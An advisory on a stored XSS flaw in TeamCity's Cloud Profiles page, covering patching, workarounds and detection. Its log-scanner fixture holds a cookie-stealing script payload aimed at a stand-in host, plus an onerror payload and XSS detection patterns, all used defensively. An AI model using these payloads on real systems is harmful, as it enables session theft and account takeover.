CVE-2025-31140
📋 TL;DR
This stored cross-site scripting (XSS) vulnerability in JetBrains TeamCity allows attackers to inject malicious scripts into the Cloud Profiles page. When other users view the compromised page, the scripts execute in their browsers, potentially stealing session cookies or performing unauthorized actions. All TeamCity instances running versions before 2025.03 are affected.
💻 Affected Systems
- JetBrains TeamCity
📦 What is this software?
JetBrains TeamCity is a continuous integration and delivery (CI/CD) server that builds, tests and deploys software. Its Cloud Profiles define how the server provisions build agents on cloud providers, so the page is normally visited by project and server administrators.
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal administrator session cookies, gain full administrative access to TeamCity, compromise build pipelines, and potentially access source code repositories and credentials stored in the CI/CD system.
Likely Case
An authenticated TeamCity user who can create or edit cloud profiles stores a script payload in the profile settings; it executes in the browser of every user who later opens the page, allowing session cookie theft or actions performed with the victim's privileges, leading to account takeover and unauthorized access to build configurations and artifacts.
If Mitigated
With the fix applied, or with correct output encoding on the affected page, injected markup is rendered as inert text rather than executed, so the stored payload has no effect.
🎯 Exploit Status
Exploitation requires an authenticated account that can create or edit cloud profiles. Once that access exists the complexity is low: because the XSS is stored, the payload persists in the profile settings and runs for every user who views the page, with no further interaction from the attacker. No public exploit is referenced on this page.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2025.03
Vendor Advisory: https://www.jetbrains.com/privacy-security/issues-fixed/
Restart Required: Yes
Instructions:
1. Back up your TeamCity configuration and data.
2. Download TeamCity 2025.03 or later from the official JetBrains website.
3. Follow the TeamCity upgrade documentation for your deployment method (Windows installer, Docker, or manual installation).
4. Restart the TeamCity service after the upgrade completes.
🔧 Temporary Workarounds
Restrict Cloud Profiles Access
Temporarily restrict or disable access to the Cloud Profiles page until patching is complete.
Configure TeamCity permissions so that only trusted administrators can create or edit cloud profiles; the payload can only be planted by a user who is allowed to edit the page, so shrinking that set shrinks the attack surface.
Implement WAF Rules
Deploy web application firewall rules to detect and block XSS payloads sent to the Cloud Profiles endpoint.
Configure the WAF to inspect requests to /app/rest/cloud/* for XSS patterns, and confirm from your own proxy logs which paths the Cloud Profiles UI actually posts to before relying on the rule. Treat this as a detection aid rather than a fix: the attacker is already authenticated, and payloads can be URL- or entity-encoded to slip past simple substring rules.
🧯 If You Can't Patch
- Output encoding of user-controllable data on the Cloud Profiles page is part of the vendor fix and cannot be retrofitted by operators; instead, limit who can edit cloud profiles and review existing profiles for unexpected markup in their names and descriptions
- Enable Content Security Policy (CSP) headers to restrict script execution sources and reduce the impact of any XSS; verify in a test instance first that the policy does not break the TeamCity UI
🔍 How to Verify
Check if Vulnerable:
Check your TeamCity version in the web UI (it is shown in the page footer) or by querying the REST API endpoint /app/rest/server, whose response carries the version string. If the version is below 2025.03 (for example any 2024.12.x release), you are vulnerable.
Check Version:
On Linux, the server log records the version at startup: grep -i version <TeamCity home>/logs/teamcity-server.log | tail -1, where <TeamCity home> is your installation directory. On any platform, GET /app/rest/server with an authenticated account returns the same version.
Verify Fix Applied:
After upgrading, confirm that the reported version is 2025.03 or higher and that the Cloud Profiles page still works, then enter harmless markup such as a bold tag in a profile description and confirm it is displayed as literal text rather than rendered.
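The version comparison above is easy to get wrong by hand (2024.12 sorts after 2025.03 as a string), so here is an added example, not code from this page or from JetBrains, that parses the version reported by the REST API and decides whether it predates the fix. The XML sample is constructed; the attribute names follow the /app/rest/server response but the values are made up.

```python
"""Decide whether a TeamCity server reports a version older than the 2025.03 fix."""
import re
import xml.etree.ElementTree as ET

# First fixed release per the advisory: 2025.03 (major 2025, minor 3, patch 0).
FIXED_VERSION = (2025, 3, 0)

# Constructed sample of the XML returned by GET /app/rest/server.
# Attribute names match the real response; the values are invented for this example.
SAMPLE_SERVER_XML = (
    '<server version="2024.12.3 (build 174331)" versionMajor="2024" '
    'versionMinor="12" buildNumber="174331"/>'
)


def parse_version(version_text):
    """Turn '2024.12.3 (build 174331)' into a comparable tuple (2024, 12, 3).

    A missing patch component is treated as 0, so '2025.03' becomes (2025, 3, 0).
    """
    m = re.match(r"\s*(\d+)\.(\d+)(?:\.(\d+))?", version_text)
    if not m:
        raise ValueError(f"unrecognised TeamCity version: {version_text!r}")
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def is_vulnerable(version_text):
    """True when the version is strictly older than the first fixed release."""
    return parse_version(version_text) < FIXED_VERSION


def check_server_xml(xml_text):
    """Read the version out of an /app/rest/server response and classify it."""
    root = ET.fromstring(xml_text)
    version = root.get("version")
    if version is None:
        # Fall back to the split attributes if the combined string is absent.
        version = f"{root.get('versionMajor')}.{root.get('versionMinor')}"
    return {"version": version, "vulnerable": is_vulnerable(version)}


if __name__ == "__main__":
    # Replace SAMPLE_SERVER_XML with the body of:
    #   curl -u user:password https://teamcity.example.test/app/rest/server
    print(check_server_xml(SAMPLE_SERVER_XML))
```

Feed the function the real response body from your server; guest access is often disabled for the REST API, so authenticate with an ordinary account. Tuple comparison handles the string-ordering trap: (2024, 12, 3) is correctly older than (2025, 3, 0).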
📡 Detection & Monitoring
Log Indicators:
- Unusual POST requests to Cloud Profiles endpoints containing script tags or JavaScript code
- Multiple failed login attempts followed by successful access to Cloud Profiles functionality
Network Indicators:
- HTTP requests containing <script> tags or JavaScript event handlers (onload, onerror, etc.) sent to /app/rest/cloud/* endpoints, including URL-encoded (%3Cscript) and HTML-entity-encoded (&lt;script) forms
SIEM Query:
source="teamcity" AND (uri_path="/app/rest/cloud/*" AND (request_body CONTAINS "<script>" OR request_body CONTAINS "%3Cscript" OR request_body CONTAINS "javascript:" OR request_body CONTAINS "onerror="))
Request bodies only appear in these logs when the reverse proxy or WAF in front of TeamCity is configured to record them; the built-in access log records the request line and status only.
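Substring queries like the one above miss payloads that arrive percent-encoded or as HTML entities. The following is an added example, not part of this page or of TeamCity, that applies the same detection to proxied-request records after decoding both encodings. The JSON records and their field names are constructed for the example; the /app/rest/cloud/ prefix is taken from this page and should be adjusted to the paths your own proxy logs show for the Cloud Profiles UI.

```python
"""Flag write requests to TeamCity cloud endpoints whose parameters carry script-like content,
after undoing the encodings that defeat a plain substring match."""
import html
import json
import re
from urllib.parse import unquote_plus

# Constructed records in the shape a reverse proxy or WAF might emit with body logging on.
# Field names are assumptions for this example, not TeamCity's own log format.
SAMPLE_RECORDS = [
    '{"method":"POST","uri":"/app/rest/cloud/profiles","user":"alice",'
    '"body":"name=aws-build-agents&description=Shared pool"}',
    '{"method":"POST","uri":"/app/rest/cloud/profiles","user":"mallory",'
    '"body":"name=%3Cscript%3Efetch(%27//collector.example.test/%27%2Bdocument.cookie)%3C%2Fscript%3E"}',
    '{"method":"PUT","uri":"/app/rest/cloud/profiles/id:3","user":"mallory",'
    '"body":"description=&lt;img src=x onerror=alert(1)&gt;"}',
    '{"method":"GET","uri":"/app/rest/builds","user":"bob","body":""}',
    '{"method":"POST","uri":"/app/rest/cloud/profiles","user":"carol",'
    '"body":"description=javascript onboarding scripts"}',
]

CLOUD_PATH = re.compile(r"^/app/rest/cloud/")

# Patterns are applied to the decoded text, so one rule covers raw, %-encoded and entity forms.
XSS_PATTERNS = [
    re.compile(r"<\s*script\b", re.I),
    re.compile(r"<\s*\w+[^>]*\son\w+\s*=", re.I),      # any tag carrying an on* event handler
    re.compile(r"javascript\s*:", re.I),                 # javascript: URLs in href/src style fields
    re.compile(r"<\s*(iframe|svg|object|embed)\b", re.I),
]


def normalise(text):
    """Percent-decode twice (catches double encoding) and then resolve HTML entities."""
    out = text
    for _ in range(2):
        out = unquote_plus(out)
    return html.unescape(out)


def matches_xss(text):
    """Return the patterns that fire on the decoded text; empty list means clean."""
    decoded = normalise(text)
    return [p.pattern for p in XSS_PATTERNS if p.search(decoded)]


def scan(records):
    """Yield one hit per write request to a cloud endpoint whose URI or body looks like XSS."""
    hits = []
    for line in records:
        rec = json.loads(line)
        if not CLOUD_PATH.match(rec["uri"]):
            continue
        if rec["method"] not in ("POST", "PUT"):
            continue                       # only writes can store a payload
        found = matches_xss(rec["uri"] + " " + rec.get("body", ""))
        if found:
            hits.append({"user": rec["user"], "uri": rec["uri"], "patterns": found})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_RECORDS):
        print(hit)
```

Only mallory's two requests are flagged: the percent-encoded script tag and the entity-encoded img tag with an onerror handler. Carol's description mentions the word "javascript" without a colon and is left alone, which is the kind of false positive a bare CONTAINS "javascript" rule would generate. Decoding before matching is what makes the rule robust; it is still a detection, not a control, so pair it with patching.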